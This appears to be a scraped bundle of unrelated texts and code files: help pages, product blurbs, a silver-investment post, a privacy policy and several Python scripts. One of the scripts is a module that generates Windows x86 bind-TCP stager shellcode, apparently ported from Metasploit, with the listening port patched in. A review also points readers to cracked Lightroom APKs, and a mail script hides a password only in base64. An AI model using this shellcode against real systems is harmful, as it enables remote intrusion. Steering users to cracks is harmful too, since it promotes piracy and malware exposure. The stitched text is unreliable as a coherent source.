The web version of DirectPass includes only a Password Exception list, which stops it from saving passwords for the websites on the list.
To add a website: click Add to open the Add or Edit an Item window, then type or paste the address of the website you want to add to the exception list.
To edit a website: click the pencil icon in the right-most column of the website you want to modify, then adjust the settings you want to change.
To delete a website: mark the checkbox of the website you want to delete, then click Remove. |
#!/usr/bin/python
# mail form program using gmail
import base64
import smtplib
from email.mime.text import MIMEText
# change smtpuser, zap
# recipients I use similar to carbon copy
# REPLY_TO_ADDRESS is the user filling out the form
def gmail(REPLY_TO_ADDRESS,data,subject):
smtpserver = 'smtp.gmail.com' # gmail smtp
smtpuser = '[email protected]' # gmail user account
    zap = ''  # paste your base64-encoded password here
    smtppass = base64.b64decode(zap)  # decode it for the SMTP login below
RECIPIENTS = ["'blah' <[email protected]>"]
msg = MIMEText(data)
msg['Subject'] = subject
msg.add_header('reply-to', REPLY_TO_ADDRESS)
    mailServer = smtplib.SMTP(smtpserver, 587)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(smtpuser, smtppass)
mailServer.sendmail(smtpuser,RECIPIENTS,msg.as_string())
mailServer.close()
if __name__=="__main__":
REPLY_TO_ADDRESS='[email protected]'
data="any message"
subject="whatever"
gmail(REPLY_TO_ADDRESS,data,subject)
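# One way to produce the encoded password pasted into ``zap`` above
# (illustrative; run once and copy the output):
#
#   python -c "import base64; print(base64.b64encode(b'my-password').decode())"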
|
Download Adobe Photoshop Lightroom CC APK v3.5.1 for Android phones; it gives you a simple solution for capturing, editing and sharing your photos.
Good pictures are something all of us want, because uploading beautiful, artistic photos has become such a trend, and all of that is possible with the help of a good camera and some photo editing. A good picture can take you back in time to memories worth remembering. Even with an ordinary camera you can get some really great shots and then edit them, but for that you need either strong editing skills or a really good photo editor. Editing skills improve with continuous practice and attention to detail, while finding a good photo editor means searching the internet and reading about the options. Adobe is no news to us when we talk about photo editors; there are several Adobe editors you can use, and one of them is Adobe Photoshop Lightroom. If you want all the basic editing tools, it is the best choice to start with, and that is why this Adobe Photoshop Lightroom review is worth reading.
Adobe is one of the most popular names when it comes to photo editors, and it is a name that no one can deny knowing. Adobe Photoshop Lightroom handles all the basic editing: making collages of your pictures so you can combine your precious moments in one image, removing red-eye, and enhancing your digital photos. Adding subtle hues, sharpening pictures, reducing noise and converting images to black and white are all things Adobe Photoshop Lightroom does best. Moreover, it includes a library and allows slideshows of your pictures. You can create photo books with this software and print images directly after editing them. If you want to download it, you will be delighted to know that an Adobe Photoshop Lightroom CC APK download is available.
The APK file of Adobe Photoshop Lightroom is very easy to download, and you can get it from a number of websites that offer APK files for such software. To use its services completely for free, people look for an Adobe Photoshop Lightroom APK download crack, which means you won't have to pay for it. So this was all you needed to know about Adobe Photoshop Lightroom and how and where you can download it for free. |
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2020 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Import types and tell flake8 to ignore the "unused" List.
from typing import Any, Dict, Optional, Tuple
from typing_extensions import Final
from ._extension import Extension
_PLATFORM_SNAP = dict(core18="gnome-3-34-1804")
class ExtensionImpl(Extension):
"""Drives ROS 2 build and runtime environment for snap."""
ROS_DISTRO: Final[str] = "foxy"
@staticmethod
def get_supported_bases() -> Tuple[str, ...]:
return ("core20",)
@staticmethod
def get_supported_confinement() -> Tuple[str, ...]:
return ("strict", "devmode")
@staticmethod
def is_experimental(base: Optional[str]) -> bool:
return True
def __init__(self, *, extension_name: str, yaml_data: Dict[str, Any]) -> None:
super().__init__(extension_name=extension_name, yaml_data=yaml_data)
python_paths = [
f"$SNAP/opt/ros/{self.ROS_DISTRO}/lib/python3.8/site-packages",
"$SNAP/usr/lib/python3/dist-packages",
"${PYTHONPATH}",
]
self.root_snippet = {
"package-repositories": [
{
"type": "apt",
"url": "http://repo.ros2.org/ubuntu/main",
"components": ["main"],
"formats": ["deb"],
"key-id": "C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654",
"key-server": "keyserver.ubuntu.com",
"suites": ["focal"],
}
]
}
self.app_snippet = {
"command-chain": ["snap/command-chain/ros2-launch"],
"environment": {
"ROS_DISTRO": self.ROS_DISTRO,
"PYTHONPATH": ":".join(python_paths),
},
}
self.part_snippet = {"build-environment": [{"ROS_DISTRO": self.ROS_DISTRO}]}
self.parts = {
f"ros2-{self.ROS_DISTRO}-extension": {
"source": "$SNAPCRAFT_EXTENSIONS_DIR/ros2",
"plugin": "nil",
"override-build": "install -D -m 0755 launch ${SNAPCRAFT_PART_INSTALL}/snap/command-chain/ros2-launch",
"build-packages": [f"ros-{self.ROS_DISTRO}-ros-core"],
}
}
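# Minimal snapcraft.yaml usage sketch (app name and command path are
# hypothetical; the extension is selected by the name it is registered under,
# assumed here to be ``ros2-foxy``):
#
#   apps:
#     talker:
#       command: opt/ros/foxy/bin/talker
#       extensions: [ros2-foxy]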
|
The Post & Rail Nightstand with one drawer and one shelf is ideal for your bedroom, or in your living room as a side table. Constructed of solid pine in a vintage espresso finish, this nightstand is accented by grain details, highlighting its expert craftsmanship.
I hope that, for the price I paid for these 2 identical items, my contribution helped in saving some trees... a fair amount of trees!
All good for the rest, thanks Jordan's! |
""" The TimeLeft utility allows to calculate the amount of CPU time
left for a given batch system slot. This is essential for the 'Filling
Mode' where several VO jobs may be executed in the same allocated slot.
The prerequisites for the utility to run are:
- Plugin for extracting information from local batch system
- Scale factor for the local site.
With this information the utility can calculate in normalized units the
CPU time remaining for a given slot.
"""
import os
import DIRAC
from DIRAC import gLogger, gConfig, S_OK, S_ERROR
from DIRAC.Core.Utilities.Subprocess import shellCall
__RCSID__ = "$Id$"
class TimeLeft( object ):
""" This generally does not run alone
"""
#############################################################################
def __init__( self ):
""" Standard constructor
"""
self.log = gLogger.getSubLogger( 'TimeLeft' )
# This is the ratio SpecInt published by the site over 250 (the reference used for Matching)
self.scaleFactor = gConfig.getValue( '/LocalSite/CPUScalingFactor', 0.0 )
if not self.scaleFactor:
self.log.warn( '/LocalSite/CPUScalingFactor not defined for site %s' % DIRAC.siteName() )
self.normFactor = gConfig.getValue( '/LocalSite/CPUNormalizationFactor', 0.0 )
if not self.normFactor:
self.log.warn( '/LocalSite/CPUNormalizationFactor not defined for site %s' % DIRAC.siteName() )
# CPU and wall clock margins, which don't seem to be set anywhere
self.cpuMargin = gConfig.getValue('/LocalSite/CPUMargin', 2) # percent
self.wallClockMargin = gConfig.getValue('/LocalSite/wallClockMargin', 8) # percent
result = self.__getBatchSystemPlugin()
if result['OK']:
self.batchPlugin = result['Value']
else:
self.batchPlugin = None
self.batchError = result['Message']
def getScaledCPU( self, processors = 1 ):
"""Returns the current CPU Time spend (according to batch system) scaled according
to /LocalSite/CPUScalingFactor
"""
# Quit if no scale factor available
if not self.scaleFactor:
return 0
# Quit if Plugin is not available
if not self.batchPlugin:
return 0
resourceDict = self.batchPlugin.getResourceUsage()
if 'Value' in resourceDict:
if resourceDict['Value']['CPU']:
return resourceDict['Value']['CPU'] * self.scaleFactor
elif resourceDict['Value']['WallClock']:
# When CPU value missing, guess from WallClock and number of processors
return resourceDict['Value']['WallClock'] * self.scaleFactor * processors
return 0
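  # Minimal usage sketch (illustrative values; assumes a supported batch system
  # environment variable such as LSB_JOBID is set and the CS scale factors are
  # defined):
  #
  #   tl = TimeLeft()
  #   scaledCPU = tl.getScaledCPU()                   # normalized CPU used so far
  #   result = tl.getTimeLeft( cpuConsumed = 7200. )  # S_OK( secondsLeft ) or S_ERROR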
#############################################################################
def getTimeLeft( self, cpuConsumed = 0.0, processors = 1 ):
"""Returns the CPU Time Left for supported batch systems. The CPUConsumed
is the current raw total CPU.
"""
# Quit if no scale factor available
if not self.scaleFactor:
return S_ERROR( '/LocalSite/CPUScalingFactor not defined for site %s' % DIRAC.siteName() )
if not self.batchPlugin:
return S_ERROR( self.batchError )
resourceDict = self.batchPlugin.getResourceUsage()
if not resourceDict['OK']:
self.log.warn( 'Could not determine timeleft for batch system at site %s' % DIRAC.siteName() )
return resourceDict
resources = resourceDict['Value']
self.log.debug( "self.batchPlugin.getResourceUsage(): %s" % str( resources ) )
if not resources['CPULimit'] and not resources['WallClockLimit']:
# This should never happen
return S_ERROR( 'No CPU or WallClock limit obtained' )
# if one of CPULimit or WallClockLimit is missing, compute a reasonable value
if not resources['CPULimit']:
resources['CPULimit'] = resources['WallClockLimit'] * processors
elif not resources['WallClockLimit']:
resources['WallClockLimit'] = resources['CPULimit']
# if one of CPU or WallClock is missing, compute a reasonable value
if not resources['CPU']:
resources['CPU'] = resources['WallClock'] * processors
elif not resources['WallClock']:
resources['WallClock'] = resources['CPU']
timeLeft = 0.
cpu = float( resources['CPU'] )
cpuLimit = float( resources['CPULimit'] )
wallClock = float( resources['WallClock'] )
wallClockLimit = float( resources['WallClockLimit'] )
validTimeLeft = enoughTimeLeft(cpu, cpuLimit, wallClock, wallClockLimit, self.cpuMargin, self.wallClockMargin)
if validTimeLeft:
if cpu and cpuConsumed > 3600. and self.normFactor:
# If there has been more than 1 hour of consumed CPU and
# there is a Normalization set for the current CPU
# use that value to renormalize the values returned by the batch system
# NOTE: cpuConsumed is non-zero for call by the JobAgent and 0 for call by the watchdog
# cpuLimit and cpu may be in the units of the batch system, not real seconds... (in this case the other case won't work)
# therefore renormalise it using cpuConsumed (which is in real seconds)
timeLeft = ( cpuLimit - cpu ) * self.normFactor * cpuConsumed / cpu
elif self.normFactor:
# FIXME: this is always used by the watchdog... Also used by the JobAgent
# if consumed less than 1 hour of CPU
# It was using self.scaleFactor but this is inconsistent: use the same as above
# In case the returned cpu and cpuLimit are not in real seconds, this is however rubbish
timeLeft = ( cpuLimit - cpu ) * self.normFactor
else:
# Last resort recovery...
timeLeft = ( cpuLimit - cpu ) * self.scaleFactor
self.log.verbose( 'Remaining CPU in normalized units is: %.02f' % timeLeft )
return S_OK( timeLeft )
else:
return S_ERROR( 'No time left for slot' )
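# Worked example (sketch): with cpuLimit=90000 and cpu=36000 in batch-system
# units, cpuConsumed=7200 real seconds and normFactor=10, the first branch
# above gives (90000 - 36000) * 10 * 7200 / 36000 = 108000 normalized seconds.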
#############################################################################
def __getBatchSystemPlugin( self ):
""" Using the name of the batch system plugin, will return an instance of the plugin class.
"""
batchSystems = {'LSF':'LSB_JOBID', 'PBS':'PBS_JOBID', 'BQS':'QSUB_REQNAME', 'SGE':'SGE_TASK_ID'} # more to be added later
name = None
for batchSystem, envVar in batchSystems.items():
if envVar in os.environ:
name = batchSystem
break
if name is None and 'MACHINEFEATURES' in os.environ and 'JOBFEATURES' in os.environ:
# Only use MJF if legacy batch system information not available for now
name = 'MJF'
if name is None:
self.log.warn( 'Batch system type for site %s is not currently supported' % DIRAC.siteName() )
return S_ERROR( 'Current batch system is not supported' )
self.log.debug( 'Creating plugin for %s batch system' % ( name ) )
try:
batchSystemName = "%sTimeLeft" % ( name )
batchPlugin = __import__( 'DIRAC.Core.Utilities.TimeLeft.%s' % #pylint: disable=unused-variable
batchSystemName, globals(), locals(), [batchSystemName] )
except ImportError as x:
msg = 'Could not import DIRAC.Core.Utilities.TimeLeft.%s' % ( batchSystemName )
self.log.warn( x )
self.log.warn( msg )
return S_ERROR( msg )
try:
batchStr = 'batchPlugin.%s()' % ( batchSystemName )
batchInstance = eval( batchStr )
except Exception as x: #pylint: disable=broad-except
msg = 'Could not instantiate %s()' % ( batchSystemName )
self.log.warn( x )
self.log.warn( msg )
return S_ERROR( msg )
return S_OK( batchInstance )
#############################################################################
def runCommand( cmd, timeout = 120 ):
"""Wrapper around shellCall to return S_OK(stdout) or S_ERROR(message)
"""
result = shellCall( timeout, cmd )
if not result['OK']:
return result
status, stdout, stderr = result['Value'][0:3]
if status:
gLogger.warn( 'Status %s while executing %s' % ( status, cmd ) )
gLogger.warn( stderr )
if stdout:
return S_ERROR( stdout )
if stderr:
return S_ERROR( stderr )
return S_ERROR( 'Status %s while executing %s' % ( status, cmd ) )
else:
return S_OK( str( stdout ) )
def enoughTimeLeft(cpu, cpuLimit, wallClock, wallClockLimit, cpuMargin, wallClockMargin):
""" Is there enough time?
:returns: True/False
"""
cpuRemainingFraction = 100 * (1. - cpu / cpuLimit)
wallClockRemainingFraction = 100 * (1. - wallClock / wallClockLimit)
fractionTuple = ( cpuRemainingFraction, wallClockRemainingFraction, cpuMargin, wallClockMargin )
gLogger.verbose( 'Used CPU is %.1f s out of %.1f, Used WallClock is %.1f s out of %.1f.' % ( cpu,
cpuLimit,
wallClock,
wallClockLimit ) )
gLogger.verbose( 'Remaining CPU %.02f%%, Remaining WallClock %.02f%%, margin CPU %s%%, margin WC %s%%' % fractionTuple )
if cpuRemainingFraction > cpuMargin \
and wallClockRemainingFraction > wallClockMargin:
gLogger.verbose( 'Remaining CPU %.02f%% and remaining WallClock %.02f%% are both above their margins (%s%% and %s%%)' % fractionTuple )
return True
else:
gLogger.verbose( 'Remaining CPU %.02f%% or WallClock %.02f%% fractions < margin (%s%% and %s%%) so no time left' % fractionTuple )
return False
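# Worked example (sketch): with cpu=900, cpuLimit=1000, wallClock=500,
# wallClockLimit=1000, cpuMargin=2 and wallClockMargin=8, the remaining
# fractions are 10% (CPU) and 50% (WallClock); both exceed their margins,
# so enoughTimeLeft() returns True.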
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
SilverDoctors: Which is the Better Silver Investment? Silver Eagles or 90% Face Coins?
As today seems to be a lazy Saturday afternoon with not much new to report, we thought we would bring readers' attention to an old piece written by Ted Butler's mentor, Izzy Friedman, and open it up to discussion.
Izzy wrote a piece several years ago advocating US Silver Eagles as the best form of silver to invest in.
While USSE's carry the highest premium over spot, Friedman looks for the US Mint to one day soon stop producing eagles entirely, which he believes will cause USSE premiums to skyrocket.
Personally, The Doc thinks that Izzy is correct, yet all of Mr. Friedman's arguments also apply to 90% silver US face coins (coins dated 1964 and earlier)- and some of these very arguments are the reason why The Doc believes 90% US face coins to be the best form of silver to purchase today.
*90% face coins have one of the lowest premiums (if not THE lowest) of any investment form of silver available today, meaning you can exchange your fiat dollars for more ounces of silver in 90% form than you can for silver rounds, bars, Eagles, etc.
*90% face coins have ALREADY been discontinued from production, meaning that the same potential production stoppage of USSE's has ALREADY happened with 90% face US coins!
*90% face coins were also produced by the US Mint, meaning that investors can trust the silver content of the coins at 90% just as much as they trust that the silver content of a silver eagle is .999.
*90% face coins are FRACTIONAL silver pieces, which The Doc believes will result in higher premiums vs. 1oz denominations when the silver shortage arrives and silver reaches valuations near Friedman's levels.
I will include Mr. Friedman's thoughts below.
We are interested in our readers' thoughts and perspective on this issue as well.
What do you believe to be the best form of silver to invest in? |
"""
Bind TCP Payload
Completely ported from Metasploit Framework:
https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/windows/bind_tcp.rb
"""
import codecs
from lib.common import helpers
class ShellcodeModule:
def __init__(self, cli_arguments):
self.name = "Bind TCP Stager (Stage 1)"
self.description = "Binds to a user provided port and listens for an incoming connection"
self.cli_name = "bind_tcp"
self.platform = "Windows"
self.arch = "x86"
self.port_offset = 197
self.customized_shellcode = ""
self.stager = (
b"\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
b"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
b"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
b"\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
b"\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
b"\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
b"\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
b"\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
b"\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
b"\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
b"\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
b"\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31" +
b"\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB" +
b"\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57" +
b"\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5" +
b"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
b"\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
b"\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3" +
b"\x29\xC6\x85\xF6\x75\xEC\xC3")
self.required_options = {
"LPORT": ["", "LPORT value"],
"Encoder": ["None", "Optional: Encoder to use when avoiding bad characters"],
"BadChars": ["\\x00", "Optional: Bad characters to avoid"],
"RHOST": ["", "RHOST value"]
}
def cli_gen_shellcode(self):
'''Invokes payload generating function since nothing special is needed
for cli specifically'''
self.payload_gen()
return
def gen_shellcode(self):
'''Invoked by main menu, generates code'''
self.payload_gen()
return
def payload_gen(self):
port_shellcode_stage = str(hex(int(self.required_options['LPORT'][0])).lstrip('0'))
if len(port_shellcode_stage.lstrip('x')) == 3:
# odd number of hex digits, so pad a leading '0' onto the front
port_1half = '0' + port_shellcode_stage[0:2].lstrip('x')
port_1half = '\\x' + port_1half
port_2half = port_shellcode_stage[2:4]
port_2half = '\\x' + port_2half
port_shellcode = port_1half + port_2half
elif len(port_shellcode_stage.lstrip('x')) == 4:
port_1half = port_shellcode_stage[1:3]
port_1half = '\\x' + port_1half
port_2half = port_shellcode_stage[3:5]
port_2half = '\\x' + port_2half
port_shellcode = port_1half + port_2half
elif len(port_shellcode_stage.lstrip('x')) == 2:
port_1half = port_shellcode_stage[1:3].lstrip('x')
port_1half = '\\x' + port_1half
port_2half = '00'
port_2half = '\\x' + port_2half
port_shellcode = port_2half + port_1half
elif len(port_shellcode_stage.lstrip('x')) == 1:
port_1half = port_shellcode_stage.lstrip('x')
port_1half = '\\x0' + port_1half
port_2half = '\\x00'
port_shellcode = port_2half + port_1half
stager_shellcode = codecs.encode(self.stager[0:self.port_offset], 'hex')
stager_shellcode = "\\x" + '\\x'.join(codecs.decode(stager_shellcode[i:i + 2], 'utf-8') for i in range(0, len(stager_shellcode), 2))
stager_shellcode += port_shellcode
part_2 = codecs.encode(self.stager[self.port_offset + 2:], 'hex')
part_2 = "\\x" + '\\x'.join(codecs.decode(part_2[i:i + 2], 'utf-8') for i in range(0, len(part_2), 2))
stager_shellcode += part_2
self.customized_shellcode = stager_shellcode
return
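# Port-conversion example (sketch): LPORT 4444 gives hex(4444) == '0x115c',
# which the branches above split into '\x11' + '\x5c' (network byte order);
# that two-byte string is spliced into the stager at port_offset.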
def print_shellcode(self):
print(self.customized_shellcode)
return
def payload_stats(self):
print(" [*] Payload Name: " + helpers.color(self.name))
print(" [*] Port: " + helpers.color(str(self.required_options['LPORT'][0])))
print(" [*] Shellcode Size: " + helpers.color(str(len(self.customized_shellcode) / 4).rstrip('.0') + '\n'))
print(self.customized_shellcode)
return
|
Thank you for your interest in Capital Financial Advisors!
import csv, sys
forwards = {}
# Load legacy forwards
def load_forwards(filename):
infile = open(filename, 'r')
load_forwards_from_stream(infile)
infile.close()
def load_forwards_from_stream(infile):
reader = csv.reader(infile, delimiter='\t')
idcolumn = 0
repcolumn = 1
for row in reader:
if row[idcolumn].isdigit():
forwards[row[idcolumn]] = row[repcolumn]
else:
idcolumn = row.index('id')
repcolumn = row.index('replacement')
# load_forwards(sys.argv[1])
# load_forwards(sys.argv[2])
# want binary mode for output...
def dump_forwards_to_stream(outfile):
writer = csv.writer(outfile, delimiter='\t')
writer.writerow(('id', 'replacement'))
for id in forwards:
target = forwards[id]
i = 0
while target in forwards:
i += 1
if i > 100:
print '** probably cycle', id
break
target = forwards[target]
writer.writerow((id, target))
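# Resolution example (sketch): with forwards == {'1': '2', '2': '3'}, the row
# written for id '1' is ('1', '3'); chains longer than 100 hops are reported
# as probable cycles and truncated.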
load_forwards_from_stream(sys.stdin)
outfile = open(sys.argv[1], 'wb')
dump_forwards_to_stream(outfile)
outfile.close()
|
eXcelleRes, based in Amsterdam, is responsible for the processing of personal data as shown in this privacy statement.
eXcelleRes processes personal data that you provide to us yourself and data generated through your use of our services.
Our website and/or service does not intend to collect data about website visitors who are younger than 16 years, unless they have permission from parents or guardians. However, we cannot check whether a visitor is older than 16. We encourage parents to be involved in the online activities of their children, in order to prevent data about children being collected without parental consent. If you are convinced that we have collected personal information about a minor without this consent, please contact us at [email protected] and we will delete this information.
– eXcelleRes analyzes your behavior on the website in order to improve the website and to tailor its range of products and services to your preferences.
– eXcelleRes tracks your surfing behavior across various websites, which lets us tailor our products and services to your needs.
– eXcelleRes also processes personal data when we are legally obliged to do so, such as data that we need for our tax return.
eXcelleRes does not store your personal data for longer than is strictly necessary to realize the purposes for which your data is collected. We use a standard retention period of 5 years for all data (including all personal data).
eXcelleRes provides your personal data to third parties only if this is necessary for the execution of our agreement with you or to comply with a legal obligation.
You have the right to view, correct or delete your personal data. You also have the right to withdraw your consent to the data processing or to object to the processing of your personal data by eXcelleRes, and you have the right to data portability. This means that you can submit a request to us to send the personal data we hold about you to you or to another organization named by you.
You can send a request for access, correction, deletion or transfer of your personal data, or a request for withdrawal of your consent or an objection to the processing of your personal data, to [email protected].
#!/usr/bin/python
# -*- coding: utf-8 -*-
""" plot_sensors.py <filename> <node_id> ...
plot sensors values from <node_id> printed by smart_tiles firmware
saved in filename (by serial_aggregator)
Example of use:
After firmware deployment on m3-29 to m3-32
mypc> aggr.sh 29 30 31 32 > data.txt
mypc> python plot_sensors.py data.txt 29 30 31 32
"""
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
FIELDS = {'time': 0, 'name': 1, 'type': 2, 'X': 3, 'Y': 4, 'Z': 5}
def imu_load(filename):
""" Load iot-lab imu file
Parameters:
------------
filename: string
imu filename saved from smart_tiles firmware
Returns:
-------
data : numpy array
[timestamp node_name sensor_type X Y Z]
"""
try:
mytype = [('time', '<f8'), ('name', '|S11'), ('type', '|S11'),
('X', '<f8'), ('Y', '<f8'), ('Z', '<f8')]
# pylint:disable=I0011,E1101
data = np.genfromtxt(filename, skip_header=1, invalid_raise=False,
delimiter=";", dtype=mytype)
except IOError as err:
sys.stderr.write("Error opening oml file:\n{0}\n".format(err))
sys.exit(2)
except (ValueError, StopIteration) as err:
sys.stderr.write("Error reading oml file:\n{0}\n".format(err))
sys.exit(3)
# Start time to 0 sec
data['time'] = data['time'] - data['time'][0]
return data
def imu_extract(data, node_name='', sensor_type='Acc'):
""" Extract iot-lab imu data for node_name, sensor_type
Parameters:
------------
data: numpy array
[time name type X Y Z]
node_name: string
name of the iot-lab name to be extracted
sensor_type: string
type of the sensor to be extracted 'Acc' or 'Mag'
"""
if node_name != '':
condition = data['name'] == node_name
# pylint:disable=I0011,E1101
filtname_data = np.extract(condition, data)
else:
filtname_data = data
condition = filtname_data['type'] == sensor_type
# pylint:disable=I0011,E1101
filt_data = np.extract(condition, filtname_data)
return filt_data
def imu_plot(data, title):
""" Plot iot-lab imu data
Parameters:
------------
data: numpy array
[time name type X Y Z]
title: string
title of the plot
"""
plt.figure()
plt.grid()
plt.title(title)
plt.plot(data['time'], data['X'])
plt.plot(data['time'], data['Y'])
plt.plot(data['time'], data['Z'])
plt.xlabel('Sample Time (sec)')
return
def imu_all_plot(data, title, ylabel, nodes, sensor_type):
""" Plot iot-lab imu data
Parameters:
------------
data: numpy array
[time name type X Y Z]
title: string
title of the plot
ylabel: string
ylabel of the plot
nodes: tab of string
list of nodes_names
"""
nbplots = len(nodes)
if nbplots > 0:
plt.figure()
i = 0
for node in nodes:
i = i + 1
node_plot = plt.subplot(nbplots, 1, i)
node_plot.grid()
plt.title(title + nodes[i-1])
datanode = imu_extract(data, nodes[i-1], sensor_type)
peaknode = imu_extract(data, nodes[i-1], sensor_type+'Peak')
print nodes[i-1], len(datanode)
norm = np.sqrt(datanode['X']**2 + datanode['Y']**2
+ datanode['Z']**2)
node_plot.plot(datanode['time'], norm)
node_plot.plot(peaknode['time'], peaknode['X'], 'ro')
plt.ylabel(ylabel)
plt.xlabel('Sample Time (sec)')
return
def usage():
"""Usage command print
"""
print "Usage"
print __doc__
if __name__ == "__main__":
if len(sys.argv) <= 2:
usage()
else:
filename = sys.argv[1]
# Verif the file existence
if not os.path.isfile(filename):
usage()
sys.exit(1)
# Nodes list
nodes = []
for arg in sys.argv[2:]:
nodes.append('m3-'+arg)
# extract data from file
data = imu_load(filename)
# Plot all sensors acc sensors
for node in nodes:
#datanode = imu_extract(data, node, sensor_type='Acc')
#imu_plot(datanode, "Accelerometers " + node)
datanode = imu_extract(data, node, sensor_type='Mag')
imu_plot(datanode, "Magnetometers " + node)
# Plot all norm accelerometers on a same windows
#imu_all_plot(data, "Accelerometers ", "Norm Acceleration (G)", nodes, 'Acc')
imu_all_plot(data, "Magnetometers ", "Norm ", nodes, 'Mag')
plt.show()
|
Our Delta table base is yet another new offering that we think you will be thrilled about. With its unique solid, stylish and modern profile in polished stainless steel, it is designed for the most discriminating tastes.
Minimal but elegant, the Delta Noveau adds a touch of class to any workplace.
A modern twist on the classic executive desk.
This executive desk offers a modern twist on a great classic line. It is a sophisticated alternative for the executive office, with both timeless form and superb function. It comprises a combined desk and return, with feature tile lines on the return undercarriage. The desktop appears to float on one side, balancing on a subframe above the return’s top, with a sturdy panel leg on the other end. This desk creates a distinctive vibe for the executive or manager who wants something aesthetically pleasing yet practical for their office.
Keeping abreast with developments in office design, Flux Executive offers a clean and minimal aesthetic to any workspace. Clean lines and balanced proportions along with 100mm height adjustment.
The clean and minimal design is what makes the Geo Executive Plaza a staple in any workplace.
The clean and minimal design is what makes the Geo Executive Vista a staple in any workplace.
The clean and minimal design is what makes the Geo Executive Verse a staple in any workplace.
It features a heavy-duty motor drive as standard, for both strength & durability. Comes in 35 different finishes.
__author__ = 'Piotr Moczurad and Michal Ciolczyk'
import os
import sys
import re
import codecs
re_flags = re.MULTILINE | re.U
author_pattern = re.compile(r'<META NAME="AUTOR" CONTENT="(.+)">', re_flags)
dept_pattern = re.compile(r'<META NAME="DZIAL" CONTENT="(.+)">', re_flags)
key_pattern = re.compile(r'<META NAME="KLUCZOWE_?\d*" CONTENT="(.+)">', re_flags)
text_pattern = re.compile(r'<P>(.+)<META NAME="AUTOR"', re_flags | re.DOTALL)
phrase_pattern = re.compile(r'([\w \-+*:,;\.]+)([\.?!]+|$)', re_flags)
abbrev_pattern = re.compile(r'\s\w{1,4}\.', re_flags)
# easier to see on debuggex.com
num_pattern = re.compile(
r'-32768|[-\s](3276[0-7]|327[0-5]\d|327[0-5]\d{2}|32[0-6]\d{3}|3[0-1]\d{4}|[1-2]?\d{1,4})(([.,;:]\s)|\s)', re_flags)
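# Note (sketch): num_pattern spells out the signed 16-bit range digit by
# digit, so it only matches integers from -32768 to 32767 (e.g. ' 32767 '
# matches while ' 32768 ' does not).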
float_pattern = re.compile(r'(-?(\d+\.\d*|\.\d+)(?:(e|E)\-?\d+)?)[.,;:]?\s', re_flags)
# the regexes below are readable only on debuggex
dates_pattern = re.compile(
r'(?P<yearA>\d{4})(?P<separatorA>[-\./])((?P<monthA1>0[13578]|1[02])'
r'(?P=separatorA)(?P<dayA1>[0-2]\d|3[0-1])|((?P<monthA2>0[469]|11)'
r'(?P=separatorA)(?P<dayA2>[0-2]\d|30))|((?P<monthA3>02)(?P=separatorA)'
r'(?P<dayA3>[0-1]\d|2[0-9])))|((?P<dayB1>[0-2]\d|3[0-1])'
r'(?P<separatorB1>[-\./])(?P<monthB1>0[13578]|1[02])|(?P<dayB2>[0-2]\d|30)'
r'(?P<separatorB2>[-\./])(?P<monthB2>0[469]|11)|(?P<dayB3>[0-1]\d|2[0-9])'
r'(?P<separatorB3>[-\./])(?P<monthB3>02))((?P=separatorB1)|(?P=separatorB2)|(?P=separatorB3))'
r'(?P<yearB>\d{4})',
re_flags) # TODO: Fix accepting 00 as day
emails_pattern = re.compile(
r'([A-Za-z0-9+\-]([A-Za-z0-9+\-]|[A-Za-z0-9+\-\.][A-Za-z0-9+\-])+'
r'@[A-Za-z0-9]([A-Za-z\.0-9][A-Za-z0-9]|[A-Za-z0-9])*\.[A-Za-z0-9]{2,4})',
re_flags)
# it is also taken into account that an e-mail address must end with a TLD
def my_match(pattern, content):
match = pattern.search(content)
if match:
return match.groups()[0]
else:
return ""
def multi_match(pattern, content):
matches = re.findall(pattern, content)
return ", ".join(matches)
def count_matches(pattern, content):
match = pattern.findall(content)
if match:
return len(match)
else:
return 0
